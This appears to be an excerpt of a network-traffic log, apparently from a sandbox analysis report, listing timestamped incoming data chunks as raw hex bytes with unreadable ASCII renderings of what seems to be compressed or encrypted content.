2022-11-28 18:03:20 UTC	75	IN	Data Raw: 03 ca c7 36 be f0 64 bc 7d 7b 60 3c 26 74 a7 ac 47 6c c2 f5 c4 13 af 92 46 86 c7 82 01 9b 89 49 8a 44 da 08 7b ab 54 c5 81 53 9a f9 a0 ff 0c 10 0d b0 dc f7 1c 17 78 48 7d f9 4d d3 b6 5a 2f fc 5d 6d e9 7e 73 4f 3d 3a 0f 73 d4 b0 ad 04 ea a5 7c af 0c d3 93 8b 37 e7 0f 9b 8e 45 5a 48 77 60 f3 da f1 12 5d d2 ff 30 aa b7 a2 eb 87 3a 86 44 e3 80 45 26 6c 6d ba c5 4a c8 8c cb 9a 50 52 6b 30 9f d8 4a ab 1d 6e ad a3 5a 6d f8 f5 40 ea 40 21 53 e7 d2 f3 f5 6b 3f 36 db 00 89 f8 28 cb 0f b9 e1 67 f6 7b 06 fc 56 bd 7d 46 e6 13 56 fd 20 e9 9c f4 b4 66 72 7f 97 ad cc 00 f8 b8 dc 0d 73 f4 1a 66 bd 88 3d 44 f4 78 53 fc bd 6b 25 e0 28 4e 7f d0 78 02 b9 66 38 9d 49 0d f3 e4 50 10 68 0d e7 d2 08 cb 27 4c ef 9f 35 af 1f 3d 25 80 76 67 bf 92 fd 5b 4c 80 99 3a ee 17 fc d2 34 59 Data Ascii: 6d}{`<&tGlFID{TSxH}MZ/]m~sO=:s\|7EZHw`]0:DE&lmJPRk0JnZm@@!Sk?6(g{V}FV frsf=DxSk%(Nxf8IPh'L5=%vg[L:4Y
2022-11-28 18:03:20 UTC	77	IN	Data Raw: 44 8a fa 8c e9 24 16 46 31 cb d2 96 7c 4c bb 37 6c 56 8d 0a 7d b3 3e 93 0f e4 17 80 49 ac 41 88 5e a9 84 cd 0f c9 a8 c1 27 99 b2 90 5f e2 cd 48 e9 d1 50 85 c9 0b b8 d8 06 04 f8 c5 41 8f 09 1a 90 a8 ce b1 86 00 cc 5b 9e 6f 2b 56 18 a7 09 9e a9 20 50 6b 21 59 ae e1 49 91 bf c7 4f 51 e2 e9 6b ac 06 1d 35 48 4a 3e 81 b8 1a 55 ae 41 b2 75 e4 c0 5e b0 01 c9 ec d5 6b 20 42 bc 75 5f c7 a9 62 b6 6f f3 af 5e f1 a0 35 cb f4 ac 6c 29 b0 e3 74 bf 9d 38 e5 41 9c 5d 12 b2 7c a0 c4 66 15 8f 74 55 b1 24 2e 93 66 29 f7 af 68 03 19 c6 fe 72 93 fa 15 ba 52 ef 4d 8b 1a 5e d8 ed f0 26 e5 98 ad 64 af 8a 57 90 61 b4 b4 05 89 50 21 f0 82 77 64 3e a5 48 96 56 81 90 00 25 2d 1e 52 92 8f 23 63 e4 15 df 5e 68 b6 19 3e 68 ba 4f d3 11 55 f9 6a 2d 2b 92 63 29 db b2 50 3f bb 93 b5 9d 0c Data Ascii: D$F1\|L7lV}>IA^'_HPA[o+V Pk!YIOQk5HJ>UAu^k Bu_bo^5l)t8A]\|ftU$.f)hrRM^&dWaP!wd>HV%-R#c^h>hOUj-+c)P?
2022-11-28 18:03:20 UTC	78	IN	Data Raw: af 64 8d 70 40 f1 4d 4c be dc bf 5b af 8a c7 7e b3 c8 06 29 7b 7d bf 9e fd 1f da 1f d1 21 45 d8 dd 27 ae 1c 7f 2f 42 1d be eb 4d e3 5e 19 71 6d 56 df fa 46 cc bd ce 0a 59 e6 ec f5 cd 48 78 5c 72 ba e3 56 99 3f d6 eb 35 96 0e db 88 4e 0d 0f c0 89 3f 15 f6 27 bc 09 bc 6d 83 95 8a cc 77 13 dd 05 c9 03 d8 1b 31 74 c3 6d 8b 00 8a 96 61 ba 69 a2 ae 68 1e 24 5e cd f6 d5 ab bc 1e 55 71 de 43 f5 ea e9 77 54 85 8f fc 12 39 9c 49 4e 11 e4 50 cd 78 2e dd 3c 72 b7 97 0d ef 24 4a e2 fe 3d 83 5a 52 1e 7f b9 e6 78 af c0 5b b1 16 1d 91 96 be 9d 59 29 c8 0d dd d7 5b 62 0f a2 80 a4 24 a6 d5 13 65 ad 69 0e 27 ea 83 ae e5 f3 ed d4 e6 3d 74 69 aa 79 9a 1a b2 84 7a ba 3c 48 bc aa 59 f8 42 1d 31 12 77 56 5f e5 1d 13 1b f6 04 45 db bf ba 88 c6 ab 86 30 98 e5 bc e5 f7 f5 9c 13 c4 Data Ascii: dp@ML[~){}!E'/BM^qmVFYHx\rV?5N?'mw1tmaih$^UqCwT9INPx.<r$J=ZRx[Y)[b$ei'=tiyz<HYB1wV_E0
2022-11-28 18:03:20 UTC	79	IN	Data Raw: de ac 85 d6 c8 af 62 19 23 77 51 5a 3f d7 38 9f da 68 90 b6 91 06 d7 35 b5 03 3e 49 78 0b 44 d8 f3 63 9d d8 d4 66 ca e2 11 33 d7 09 20 42 37 c7 32 fa 3c 9d c9 43 f3 c5 5e 65 73 0a de ea 1b 8f d6 33 27 a7 b1 ac 39 72 be 2a 5d 12 d8 bb da c1 6f 15 05 b1 02 59 ec a1 e9 ed 57 cc 44 0b eb 19 d2 c6 08 b2 59 b5 ce a2 b4 c6 6e 80 18 f1 9b e3 b3 dd f2 ad 0c ba 8c 60 86 f4 49 6b 8d 80 af 57 8a 73 92 64 b4 76 32 6b bb 81 1a 35 da 58 16 6a c7 5e 1d c9 90 c3 54 1b 64 f2 fd a2 95 c6 91 93 9a 00 f1 24 e9 bb e6 cd de 63 4a 52 49 77 93 ff 14 f4 32 7b af fc 81 b7 1d e2 d4 72 3e 08 9c dc 31 7b de 45 6c 0b 7a f5 00 85 97 a5 d5 46 56 fe 8b 36 97 5b 5b dd 96 bd 2e 84 84 9b 5e ce b3 91 3e 05 75 5e 5a 99 64 f7 8b 14 36 e1 20 e4 b6 84 ec b7 2b 8a a5 2a e7 dc 89 72 3e ad fb cf b6 Data Ascii: b#wQZ?8h5>IxDcf3 B72<C^es3'9r]oYWDYn`IkWsdv2k5Xj^Td$cJRIw2{r>1{ElzFV6[[.^>u^Zd6 +r>
2022-11-28 18:03:20 UTC	80	IN	Data Raw: 47 f2 a0 d7 e4 09 ab 09 b9 69 c8 06 5a 2c c2 82 82 77 d4 d3 ad b5 38 3b 41 26 40 fb fd e6 a1 59 96 61 9f 90 ba 2b 59 ef 58 cb 32 3a 1a b6 b0 16 c1 0b f7 b0 05 80 c8 f0 d4 84 48 79 f2 90 32 5e aa 19 5b af 5c 15 ea dc 3d 72 fe bb 55 b8 0b 58 74 ff 3d 25 5b 25 a3 7f 21 3d 60 5b ba 7f f0 e5 0e 79 d5 c5 13 59 8f 04 5d 85 1d be f8 48 de 7f 0e 50 18 83 b3 98 23 ec f5 34 31 bb 85 ca 4e a4 13 a3 66 82 96 06 19 aa d3 af a7 c2 73 49 e9 79 6a 91 38 0a 26 ad 52 20 f9 a6 6f 6c dd b3 aa ea ff a8 34 86 35 8f 6c 4e e5 bc 7a 14 a3 20 b0 08 99 fb 7e 57 8d c8 f7 31 9d 91 be b2 41 02 ee 89 b1 1e 35 e4 0c 3e d5 0c e8 44 85 ec 64 36 52 56 7c d5 55 46 f4 3e 97 13 ea 53 28 03 d4 ea b9 ca c4 85 33 35 9a bf da 63 2d 23 8e fa d9 db 18 5c cb 11 d6 4c 2d b3 bf af e1 33 86 e9 f2 ad 95 Data Ascii: GiZ,w8;A&@Ya+YX2:Hy2^[\=rUXt=%[%!=`[yY]HP#41NfsIyj8&R ol45lNz ~W1A5>Dd6RV\|UF>S(35c-#\L-3
2022-11-28 18:03:20 UTC	82	IN	Data Raw: 83 06 e8 a1 2a a4 d9 c1 f8 34 9b 25 99 2f f3 ce 32 81 3f 3a 1f 88 35 5b 13 92 49 49 8f 6e 84 3c 71 9b 55 4c 60 32 d9 0b 2d e1 bd 8b f5 49 05 2c 54 52 97 0f 72 af ef 4c e1 5f ae b6 80 1a 55 7b 80 eb e4 42 57 20 42 68 a9 bc 26 94 cb 87 6b 5b f9 cd 0b 67 49 f1 40 b8 d2 52 32 82 a4 b7 1b 49 73 43 ec 05 5a 32 32 a7 14 33 8e 67 Data Ascii: *4%/2?:5[IIn<qUL`2-I,TRrL_U{BW Bh&k[gI@R2IsCZ223g
2022-11-28 18:03:20 UTC	82	IN	Data Raw: 81 70 00 84 b5 5b 99 cd af 0e c1 e6 0b 55 3a 45 79 68 b2 db 07 f6 c2 b7 8c 43 a6 12 1a 96 d5 a7 6a 2b 57 2f ef 4c a9 e2 2c 48 d5 a3 1d b0 0a c2 9d 70 3b c7 f3 d8 47 96 fc 8f d6 8e 91 ae dc 4a e0 30 f9 57 61 1a d6 cf dd fd ac 7e d8 07 d1 13 51 61 35 94 41 18 64 7c 4e b0 86 2b b5 c5 a5 e1 f7 d9 4c da 40 54 84 42 f4 9d 4d 44 85 66 65 db 93 85 9f 32 ae 57 ab ff 42 d2 5c 5e 7e 91 14 a4 4e 03 be 02 36 8d 31 31 e2 a7 ac be df 32 1a 1e 0b 22 e4 2e 3e 1f 82 d8 08 4c 56 70 b2 2a 16 6e 6f 33 38 95 3b 09 2e e8 f5 07 82 31 8d c4 c6 d3 e8 94 82 16 5a dc 7f 40 e8 fc 77 18 2e f9 e4 49 e1 bc 83 d0 81 f5 43 de 98 70 19 99 a6 3b 27 d7 f4 da aa cd 64 32 55 72 a0 6f bb b1 1d ff 8e 39 5d 2b 9c dc ca 21 5c cd ec 82 d1 98 8a 33 81 53 0a fc 93 33 42 2c 89 34 3b 85 fc 0e 25 11 b3 Data Ascii: p[U:EyhCj+W/L,Hp;GJ0Wa~Qa5Ad\|N+L@TBMDfe2WB\^~N6112".>LVp*no38;.1Z@w.ICp;'d2Uro9]+!\3S3B,4;%
2022-11-28 18:03:20 UTC	83	IN	Data Raw: 3d ae 26 53 f4 78 7c 85 12 c1 7a 53 e2 d7 a5 7c 8e 3f b7 6f 26 91 92 b7 15 02 42 84 71 96 d4 af ac 4a 39 c5 17 81 70 fd 10 16 2c c3 fd 5f d8 aa 55 ce fa 1e c8 5f ab 52 ae a3 9f 97 7a c2 33 49 06 5b 53 cd eb b6 cb b0 42 e3 68 d2 af cd ef 72 c3 0e 09 c9 71 43 77 69 0f 00 74 86 06 e6 eb b9 14 12 83 1b 6a 1b e2 e7 4e 3c 8f 94 b6 31 59 fe 45 fc 39 72 95 8c f6 2b 46 62 7d 71 71 77 1e 16 30 e5 6f de 7c 72 f5 c1 5d 81 8e dd a1 de c4 ed f8 9b 78 54 7c ab d1 e4 3c 79 dd 78 14 3f 11 2b e0 f1 57 c5 5e 8c a0 d2 a8 ee f6 6e 84 b6 b9 94 d5 cf 93 da be dc ac f9 3d dc 94 92 ab 9a dc d9 b9 3f 9c 20 60 ed 47 ba e3 93 06 ab d1 b9 38 7b 92 88 70 07 f7 03 4e 9d 8e 3c 8f a5 7c 13 47 f0 7b a5 99 43 15 e1 f4 c1 31 de 9f 1a 3b a1 f4 a5 9d 14 fd 89 9e 29 cc a4 a4 2c 3f b1 71 a9 25 Data Ascii: =&Sx\|zS\|?o&BqJ9p,_U_Rz3I[SBhrqCwitjN<1YE9r+Fb}qqw0o\|r]xT\|<yx?+W^n=? `G8{pN<\|G{C1;),?q%
2022-11-28 18:03:20 UTC	84	IN	Data Raw: 7d 8e 7e 32 81 8e 2e 36 b8 c2 8c b0 36 47 b2 e6 2d 5c a3 3b fd 75 8c 57 7e 63 43 38 22 80 cd 72 cf 0e 33 48 f2 25 ae 28 f1 df e8 47 a0 6c ae 08 99 e4 1c 8f 46 b2 8b 94 f4 95 26 8f 5d db 1c a0 09 7f 83 0b 23 f7 86 a3 04 8c 6d 0a eb fa 1b 98 02 6c 51 90 3f a5 89 46 99 0c 10 d0 e3 9c 63 89 c5 60 d9 19 6c fa 9f 2e 14 0d 25 87 3a 75 66 01 de 74 94 ec b3 49 7a f5 4f 43 43 78 81 1a 9a 10 b8 be 18 4a 5a cd 42 dc 63 30 6c a5 03 38 46 44 57 f4 41 a3 5f 90 34 e6 a6 ae 32 ba ed 20 ce 62 1d 5d 76 a6 cd ac 78 5c 72 3a 3a 28 27 c0 d0 56 a4 6b e3 4c 0f 8b d3 5f 28 cb 36 f7 01 80 a5 84 8c 91 80 f0 37 3e fe 4e aa ad 1d 2f 53 64 30 ff 78 fe 6f 56 ae 97 d7 31 1c 3b 5e 91 00 04 dc 8c c5 e3 6d a8 b5 0e 70 e2 4f 11 74 a3 b3 69 45 67 fe 31 63 33 e8 0b b9 e4 da 97 6f fb 2b 2a eb Data Ascii: }~2.66G-\;uW~cC8"r3H%(GlF&]#mlQ?Fc`l.%:uftIzOCCxJZBc0l8FDWA_42 b]vx\r::('VkL_(67>N/Sd0xoV1;^mpOtiEg1c3o+*
2022-11-28 18:03:20 UTC	85	IN	Data Raw: 73 e0 9a 01 3d 09 fc 22 2d 9f 44 13 9d 8b a5 56 de 03 29 e1 a0 7c 1f 00 7e 41 aa b0 34 8f 32 be ad a6 35 ce 60 ba e5 81 4e bb 95 c3 c3 72 bc fe 1e 1e 59 cf c0 73 18 7c dd bc 93 5e 41 de 8b f0 5e 57 80 77 5e d4 bf 6c 4a e0 6c c9 ca 93 3d 6b d7 e8 30 1f 21 07 3a 2b 4a 5f e5 40 1b cb 91 7b 6c cc 1b 5e 3f 7b 3e a5 46 53 02 f9 ad af 62 de eb 42 cf cd a9 87 5d d8 af c6 71 ee 3f b6 6e 41 e2 42 6c cb a1 1a d0 44 7e 21 ee b7 b2 d5 13 c1 9e b5 58 56 4f 25 45 61 c7 f6 b8 62 65 6f 96 c5 1a a2 93 62 41 15 91 93 b1 33 77 60 46 c0 ad 8d 37 1c 34 12 b4 7c 3a b1 f5 ea 9f 84 02 59 ec 66 02 99 de 33 df 3f 87 19 be 01 a3 ca c0 4a 5d 91 d8 c6 6e 47 d1 e9 14 5b 29 91 a2 df 63 1e 6c 84 0e 79 d3 1d e9 e4 dd bb 7c 84 6f 9b 19 c5 db ad 32 2d 91 6d ae 2d 65 f9 2d 96 8f 45 2a 8b 26 Data Ascii: s="-DV)\|~A425`NrYs\|^A^Ww^lJl=k0!:+J_@{l^?{>FSbB]q?nABlD~!XVO%EabeobA3w`F74\|:Yf3?J]nG[)cly\|o2-m-e-E*&
2022-11-28 18:03:20 UTC	87	IN	Data Raw: ea f3 17 12 e7 ae 7a 7a d9 d0 aa 59 16 17 e1 0b 2d 86 05 3a 56 50 59 98 77 d6 72 fc ac d0 11 c5 5e 38 28 ed dd 1f 66 ee 8a 2f 7e a3 8f 06 1f 22 99 67 3e b8 8f db 7a d1 7d 13 cc 35 6b 9a 91 80 2a 4e 29 00 9e c5 82 5e c3 34 1d db f1 32 b5 69 98 ce 10 1d 0c ad 9c a5 6c f0 68 72 bf bf de d8 76 5b dc fd 5b 66 d7 00 66 0d 2a 28 a6 0f ea 09 22 ec cb f9 d5 d3 18 72 b0 77 72 56 a1 4a 88 c4 ee ce 65 fb 48 63 94 a6 49 9e 7f 99 9e 2b e6 6a 74 34 91 c5 78 92 90 16 72 8e ca 4f fa 7f 28 f6 c9 84 c0 fc e2 6f a8 a1 79 ea 7a af bb 90 dd 23 ad 8d 52 53 61 b8 bb dd 7d 00 b0 da bc 2f be 7f a9 b8 7c a4 20 80 b7 11 2f 79 32 40 30 a6 04 fb ac 86 3e be 53 cd cf 80 f1 af 4a 74 af 98 a2 69 e8 cb a0 44 d9 39 67 a4 a6 26 3a 7d 20 f9 24 41 f0 af 3c 87 a0 3c 72 39 0f 56 14 8e 6c 31 7c Data Ascii: zzY-:VPYwr^8(f/~"g>z}5kN)^42ilhrv[[ff("rwrVJeHcI+jt4xrO(oyz#RSa}/\| /y2@0>SJtiD9g&:} $A<<r9Vl1\|
2022-11-28 18:03:20 UTC	88	IN	Data Raw: c6 12 3c d7 b4 30 4f 0e 75 3a 44 70 39 e5 29 23 97 91 1e 49 bf 68 02 3f 5e 3e d6 23 53 7a f9 c8 8a 62 ad a6 7f ac e8 c0 86 38 e5 da c6 15 82 6c 95 28 74 b5 5f 3e dd fd 32 b9 46 0c 03 9d b7 d4 cf 4f e9 ec a9 28 5b 20 1e 37 70 b7 ec c1 0d 36 09 f3 ac 5e ce f6 07 23 66 e4 bd d6 5a 27 0e 34 a9 c4 8d 41 1c 5d 12 d8 59 5f c2 92 b6 fa c9 02 36 ec 1c 6c f0 aa 5f bb 53 eb 78 d2 5d 8d 99 a4 2f 31 f0 b4 8b 6e 28 9d e3 66 77 4c 80 f2 d4 0c 21 09 b0 7b 79 b6 33 8d e6 af b7 0f 9b 6f fe 4b c2 b7 bf 46 5b e5 7f da 58 16 ad 42 f7 e0 45 6f a5 54 5d 64 59 78 5d 68 5a 6e b8 9a 5c f1 a1 6c 5d 1b 5d 21 2f 4a 21 49 d5 16 15 e9 57 cd 37 af 8e 81 1f 98 18 29 e4 c1 25 9c b9 31 cf 5b cb 91 9d 85 d9 00 ec 97 62 50 c7 ab 72 74 71 97 1d 5b 76 13 7a d3 18 7b d4 5e 92 b3 14 bb db 88 ce Data Ascii: <0Ou:Dp9)#Ih?^>#Szb8l(t_>2FO([ 7p6^#fZ'4A]Y_6l_Sx]/1n(fwL!{y3oKF[XBEoT]dYx]hZn\l]]!/J!IW7)%1[bPrtq[vz{^
2022-11-28 18:03:20 UTC	89	IN	Data Raw: 41 b5 35 d7 eb 62 6e 6e ad f5 a5 18 d5 1d 01 d2 e3 de 9e 3f 34 ae 8e 32 15 b3 61 0f 40 5f 49 cb 66 ea 65 7e b0 84 89 a5 a1 7d 1d c2 11 13 3f fd 26 c7 a1 9e bd 00 d5 3a 0a f5 c8 69 f7 31 99 fb 0e 9e 19 00 68 cd 83 1c fd f1 65 06 fd ab 2e fa 32 28 97 95 ed 8f 90 92 33 cd f1 0b 98 1b c0 9b f6 8e 4a c2 e1 34 36 15 cb cc 81 1c 25 c2 a9 d9 2f e2 7f e6 9d 0c d7 45 dc c5 5d 4e 0c 12 2e 63 c7 70 88 cd e5 5c df 3f bd aa e5 f1 f3 4a 38 f3 ed e4 07 8d aa ce 37 ab 5a 0e c5 d4 56 1a 18 69 cf 4a 1d 93 df 60 eb f3 49 1e 5e 6a 3f 7d e0 1c 42 12 7c 3e 98 e7 24 13 b1 aa 69 ba 60 1c 6f 75 bc ab 3a 75 70 b5 79 a3 d5 f5 ac 98 75 3e 61 4a a0 6f d8 51 b5 be 4c 04 a6 79 ae f0 5f f2 e3 ac a4 df 7d e8 ae c0 70 e4 ed 12 64 bb a5 fd 0c 00 47 97 e1 af c8 19 e6 94 db 7e ca 74 10 e6 08 Data Ascii: A5bnn?42a@_Ife~}?&:i1he.2(3J46%/E]N.cp\?J87ZViJ`I^j?}B\|>$i`ou:upyu>aJoQLy_}pdG~t
2022-11-28 18:03:20 UTC	90	IN	Data Raw: e1 62 7e 6f 92 c5 29 a2 9d 62 23 15 b7 93 99 33 61 60 60 c0 93 8d 00 1c 0f 12 9d 7c 03 b1 df ea 95 84 78 59 85 66 00 99 c6 33 da 3f b7 19 82 01 ec ca c8 4a 54 91 94 c6 23 47 f2 8d 09 1c 22 e5 f2 ad 0c 7d 09 e0 7b 0b 93 5c fe 80 f3 de 43 f7 1a 9b 25 b1 d6 e3 35 7e 86 0c bb 58 66 ad 27 d2 bc 36 23 f9 21 1b 0a 35 19 32 1b 39 0d d3 fb 00 81 e3 09 2f 2d 32 7d 58 3a 52 25 b0 63 67 8e 0b a4 47 c1 fc f2 70 c4 7e 52 8d f8 49 de dc 75 bc 1f e5 a4 f4 b6 b7 31 85 a3 62 7d e2 99 01 44 2d d6 5b 6d 1a 3e 15 e7 7b 1f bf 67 ce 8b 56 96 a9 c9 a1 e7 bc 57 f7 bb 9d 9e 51 e5 1b 7a 43 5b 03 e3 75 1b 6c de dc bc b5 8c 15 31 30 78 80 dd 56 c5 a0 8e c4 38 82 fb cd dd cb 24 ca ae 3d ad b8 e8 02 ff b5 97 a5 f7 c4 5e 1f c7 a8 20 6b f1 0b af b2 5d 8d 55 8d 98 7c 15 60 5a ad 62 ab 9a Data Ascii: b~o)b#3a``\|xYf3?JT#G"}{\C%5~Xf'6#!529/-2}X:R%cgGp~RIu1b}D-[m>{gVWQzC[ul10xV8$=^ k]U\|`Zb
2022-11-28 18:03:20 UTC	91	IN	Data Raw: f7 4f ab 7f 5d f6 e5 84 d5 fc fb 6f a1 a1 67 ea 7a af c7 90 fe 23 b0 8d 5b 53 73 b8 a5 dd 70 00 a7 da aa 2f be 7f 82 b8 69 a4 23 80 a4 11 3b 79 7e 40 17 a6 2c fb af 86 2e be 50 cd dd 80 82 af 2f 74 97 98 85 69 f9 cb af 44 85 39 6a a4 b6 26 1a 7d 69 f9 47 4b 9a af 01 f5 81 5d 67 39 6a 56 19 e7 7f 45 12 20 3e e3 83 7c 67 92 aa 2d ba 24 6f 2e 07 e6 c5 6c 75 44 e6 31 d1 91 90 ee 98 34 77 57 24 8d 1c ec 25 d1 df 75 68 9e 15 83 b4 1e 9b a1 de 97 df 4d e8 83 c0 48 e4 de 41 56 f4 90 bb 4d 54 7e c0 d4 ee ff 4b d1 d1 ea 22 8f 35 55 96 75 ea 78 f3 d7 4b b9 ee fa 5d 9e cf de 37 51 a6 8b 1d 0f a6 63 c4 33 33 ac 1e 60 66 48 3d 52 04 1d 49 2a 15 e0 aa 01 5d 09 a8 22 73 9f 48 13 8d 8b b6 56 b0 03 50 e1 ec 7c 48 00 3f 41 94 b0 29 8f 3d be bc a6 71 ce 58 ba d3 81 25 bb 9c Data Ascii: O]ogz#[Ssp/i#;y~@,.P/tiD9j&}iGK]g9jVE >\|g-$o.luD14wW$%uhMHAVMT~K"5UuxK]7Qc33`fH=RI*]"sHVP\|H?A)=qX%
2022-11-28 18:03:20 UTC	93	IN	Data Raw: fe 0f a2 6f e8 4b d4 b7 91 46 7e e5 42 da 16 16 f9 42 82 e0 16 6f bc 54 76 64 54 78 5b 68 55 6e f3 9a 41 f1 87 6c 4b 1b 40 21 3d 4a 21 49 c3 16 67 e9 0b cd 09 af b2 81 24 98 2e 29 ad c1 1c 9c af 31 d9 5b 97 91 d4 85 f9 00 e4 97 0f 50 87 ab 01 74 2d 97 15 5b 54 13 41 d3 2b 7b 9f 5e 9d b3 33 bb db 88 d7 a5 d9 64 85 8b 9d b3 18 dd 56 49 02 69 53 d6 55 5a 3f e7 b9 89 c7 bb 63 06 55 49 f2 98 56 80 e9 f3 89 38 c3 fb 9d 8e eb 6b 9f e8 4e f9 dd bf 70 be 95 c5 eb b2 a5 02 72 8c cd 0d 6b bc 0b ca fb 31 c0 30 cc f7 2c 7b 40 5a f8 31 d8 ff 74 5f 6b a2 f7 ec a4 f4 97 46 e6 8b 3b 81 41 ce c2 bb 56 e3 46 cd 1d 06 f4 57 b8 d1 1f 0f 3e 93 a5 b2 89 f3 25 12 f6 ae 69 7a c3 d0 a6 59 0a 17 a0 0b 3f 86 25 3a 75 50 2c 98 4f d6 7a fc bb d0 28 c5 67 38 3b ed dd 1f 65 ee aa 2f 2b Data Ascii: oKF~BBoTvdTx[hUnAlK@!=J!Ig$.)1[Pt-[TA+{^3dVIiSUZ?cUIV8kNprk10,{@Z1t_kF;AVFW>%izY?%:uP,Oz(g8;e/+
2022-11-28 18:03:20 UTC	94	IN	Data Raw: dc d4 7a 1a 1f 69 90 4a 35 93 c4 60 ee f3 52 1e 5c 6a 2e 7d a0 1c 55 12 53 3e e3 e7 37 13 dd aa 59 ba 48 1c 2a 75 8f ab 21 75 6a b5 36 a3 94 f5 ff 98 44 3e 57 4a 8d 6f a0 51 b0 be 06 04 ea 79 d6 f0 6d f2 c4 ac f3 df 1d e8 f1 c0 27 e4 b8 12 3f bb fc fd 28 00 7e 97 87 af 90 19 b7 94 9e 7e f8 74 34 e6 07 9a 1d 9f 8b 2e fb ce 93 1e ea a0 a8 5a 38 d6 f8 68 6a d2 3f a1 71 41 da 32 33 46 3b 74 3a 6a 5e 2a 46 3b 89 f6 64 0e 67 c9 56 15 9f 29 13 ff ae df 25 b0 5f 50 a3 ec 10 48 61 1a 3b e7 d5 75 c9 7c ca cc d6 01 92 34 c9 b6 e8 05 cf df a6 ab 5c f5 9a 77 7f 16 bb 90 73 7f 7c 8c bc c1 5e 41 8d 8b 9f 36 45 f4 73 64 8c 90 0d 22 e6 18 dc b9 f5 12 02 d7 84 30 7e 0e 74 3a 43 70 0f e5 25 23 9a 91 10 49 90 68 1c 3f 17 3e c4 23 29 7a 9c c8 e9 62 aa a6 53 ac f9 c0 ba 38 fa Data Ascii: ziJ5`R\j.}US>7YHu!uj6D>WJoQym'?(~~t4.Z8hj?qA23F;t:j^F;dgV)%_PHa;u\|4\ws\|^A6Esd"0~t:Cp%#Ih?>#)zbS8
2022-11-28 18:03:20 UTC	95	IN	Data Raw: 35 e2 d9 01 02 2d f2 5b 29 1a 60 15 fd 7b 03 bf 33 ce df 56 bb a9 88 a1 80 bc 17 f7 d7 9d f5 51 b4 1b 25 43 0c 03 8c 75 33 6c 8b dc e5 b5 da 15 5a 30 3a 80 f1 56 f4 a0 96 c4 55 82 9a cd e0 cb 0a ca 8f 3d 9c b8 cd 02 90 b5 bd a5 df c4 6e 1f 8c a8 0d 6b 99 0b b9 b2 6d 8d 76 8d 9b 7c 1a 60 29 ad 59 ab b9 11 07 19 f2 f7 ec ec de c3 15 b2 e2 6b f5 61 ab 97 c8 25 cd 23 a9 6f 67 f4 23 f0 d1 4b 0f 6a b9 f5 c3 a9 86 76 7b 93 cd 1b 11 b5 fe c3 3d 78 76 80 7f 6a 86 77 3a 39 16 2c ec 07 a6 2e af ef b5 78 b7 2a 4e 5a 88 b4 6d 09 ee 8a 69 7e d7 c8 76 70 77 f6 14 59 dd e3 a9 1f 9f 21 72 8f 58 03 ff e3 80 45 08 44 74 fb b5 a2 0e 90 55 65 a8 a2 41 b5 1e d7 a1 62 6f 6e c9 f5 a5 18 af 1d 34 d2 cb de a8 3f 0b ae 9c 32 15 b3 73 0f 7a 5f 47 cb 7d ea 6d 7e ec 84 f9 a5 d3 7d 72 Data Ascii: 5-[)`{3VQ%Cu3lZ0:VU=nkmv\|`)Yka%#og#Kjv{=xvjw:9,.x*NZmi~vpwY!rXEDtUeAbon4?2sz_G}m~}r
2022-11-28 18:03:20 UTC	96	IN	Data Raw: 82 de 66 56 cb 90 ad 4d 72 7e f8 d4 c9 ff 70 d1 f8 ea 1b 8f 07 55 cb 75 f0 78 b1 d7 44 b9 bd fa 7a 9e a0 de 0a 51 b7 8b 1b 0f a1 63 a1 33 41 ac 7a 60 29 48 07 52 1e 1d 2a 2a 3b e0 a6 01 61 09 bb 22 61 9f 29 13 ff 8b 8c 56 df 03 36 e1 98 7c 3f 00 7b 41 95 b0 10 8f 20 be 80 a6 68 ce 5a ba d7 81 76 bb 99 c3 ff 72 a5 fe 2b 1e 45 cf f9 73 0b 7c e9 bc e1 5e 0c de ea f0 58 23 95 07 03 fb f5 6c 50 94 18 b9 b9 a9 37 44 a4 e8 6c 1f 61 07 60 2b 1f 5f 8b 40 46 fb a2 7b 0d cc 34 5e 72 7b 47 a5 65 53 2e f9 98 af 3e de cb 23 d5 a5 a6 e9 4c 9f aa af 3b ee 05 f9 46 15 dc 03 3e 8e fd 57 9c 27 7f 4e c1 d8 9a a1 2a 82 98 cc 6c 22 52 42 5e 00 c1 9e a4 62 6a 6f bd c5 1a a2 a5 62 4a 15 90 93 b3 33 54 60 1a c0 ad 8d 2f 1c 34 12 d8 7c 7a b1 e1 ea a6 84 4c 59 89 66 18 99 ee 33 c9 Data Ascii: fVMr~pUuxDzQc3Az`)HR*;a"a)V6\|?{A hZvr+Es\|^X#lP7Dla`+_@F{4^r{GeS.>#L;F>W'Nl"RB^bjobJ3T`/4\|zLYf3
2022-11-28 18:03:20 UTC	98	IN	Data Raw: a1 02 7c 8c dd 0d 19 bc 6e ca f4 31 d5 30 8d f7 59 7b 13 5a f1 31 f8 ff 74 5f 6a a2 84 ec 85 f4 ac 46 dc 8b 18 81 61 ce bd bb 0b e3 4a cd 01 06 9d 57 f0 d1 1b 60 18 e7 f5 b2 a9 f3 4a 2c 93 ae 4e 09 d0 a2 8d 38 15 72 80 0b 6a 86 27 5b 4a 23 5b f7 75 b2 2e fc ef d0 5d c5 59 38 06 ed e7 1f 6f ee fe 2f 0e a3 86 06 15 22 82 67 Data Ascii: \|n10Y{Z1t_jFaJW`J,N8rj'[J#[u.]Y8o/"g
2022-11-28 18:03:20 UTC	98	IN	Data Raw: 1d b8 91 db 76 d1 57 13 ea 35 03 9a c9 80 6b 4e 27 00 9d c5 c5 5e 90 34 65 db a2 32 90 69 a4 ce 3e 1d 3d ad 9d a5 7d f0 6f 72 a0 bf b1 d8 5b 5b 8e fd 71 66 dc 00 62 0d 2f 28 be 0f 9e 09 1b ec f6 f9 d6 d3 21 72 b1 77 7b 56 98 4a b5 c4 ec ce 6f fb 5e 63 d5 a6 2f 9e 65 99 ab 2b c2 6a 66 34 ac c5 6a 92 9e 16 74 8e c2 4f 8e 7f 4d f6 e6 84 8f fc 92 6f ee a1 6f ea 74 af f8 90 fb 23 af 8d 51 53 7b b8 b8 dd 32 00 a4 da b8 2f 94 7f 89 b8 7e a4 2c 80 b1 11 2b 79 5f 40 02 a6 1e fb ac 86 3b be 5a cd d8 80 db af 4a 74 f3 98 c1 69 fe cb 92 44 f8 39 63 a4 b5 26 68 7d 1d f9 0c 41 c7 af 30 87 f3 3c 65 39 40 56 53 8e 64 31 7f 20 52 e3 e7 1d 13 f3 8f 2d c9 24 40 5a 26 8f df 0b 14 44 d3 54 c5 e7 d8 9c de 34 6a 57 1a 8d 33 ec 22 d1 d7 75 70 9e 1c 83 83 1e dc a1 c5 97 b1 4d 81 Data Ascii: 